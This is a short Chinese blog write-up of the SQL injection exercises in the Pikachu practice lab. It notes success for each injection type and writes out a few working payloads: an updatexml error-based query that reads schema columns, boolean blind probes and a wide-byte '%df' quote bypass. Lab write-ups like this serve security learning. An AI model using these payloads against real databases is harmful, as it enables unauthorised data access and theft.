pikachu的sql注入

Posted 2021-03-22 p201721440034

数字型注入（post)

 burp抓包

 成功

 

 

 

字符型注入（get)

 直接注入

 成功注入。

 

 

 

 

搜索型注入

 使用同样的方法也能同样注入成功

 

xx型注入

需要闭合

 加）之后注入成功。

 

 

 

 

 

insert/updata 注入

a‘ or updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_name=‘member‘ limit 1,1)), 0) or ‘

burp抓包修改

 

 

 

注入成功。

delete 注入

 

 

 

 

 注入成功

 

 

http header注入

 

 

 

 注入成功

 

盲注 base on boolian

 

 

 

 

 

kobe‘ and length(database())>5#
。。。
kobe‘ and length(database())=7#

kobe‘ and ascii(substr(database(), 1, 1)) > 105#
慢慢盲注，只能挨个试。。

盲注（based on time）

 同样的也是挨个试，这次看对错是看这个反应时间，要是可以的话就会五秒多一些。

 

 

 

宽字节注入

 刚开始尝试发现注入不行，抓包发现以及进行了编码

 在抓包后修改也不行　　

 发现‘被后台转移，所以构造payload kobe%df‘ or 1=1#

 

 

 

 

 

 

 

 注入成功